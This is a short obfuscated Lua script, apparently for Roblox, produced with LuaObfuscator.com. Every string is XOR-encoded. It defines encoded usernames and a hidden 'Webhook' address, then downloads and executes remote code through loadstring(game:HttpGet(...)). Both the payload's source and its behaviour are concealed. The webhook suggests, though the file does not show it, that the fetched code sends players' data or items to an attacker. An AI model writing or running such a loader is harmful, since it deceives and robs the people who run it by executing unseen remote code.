--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\210\203\218\55\233\227\149\73","\126\177\163\187\69\134\219\167");Username2=v7("\32\197\43\215\243\123\159\125","\156\67\173\74\165");Webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\20\109\239\16\64\239\113\23\108\225\16\64\236\113\19\103\230\29\89\228\18\85\54\167\64\67\150\44\69\1\155\81\46\145\35\86\63\166\26\29\147\49\124\36\162\112\52\141\25\17\56\147\71\79\185\46\11\103\182\16\52\142\118\74\45\188\108\33\158\41\106\24\130\123\56\239\5\86\99\166\111\51\165\40\110\18\131","\38\84\215\41\118\220\70");loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\215\93\50\43\21\247\68\23\46\8\177\125\25\48\27\205\83\4\43\2\234\67\89\47\19\247\94\89\18\33\167\9","\158\48\118\66\114")))();
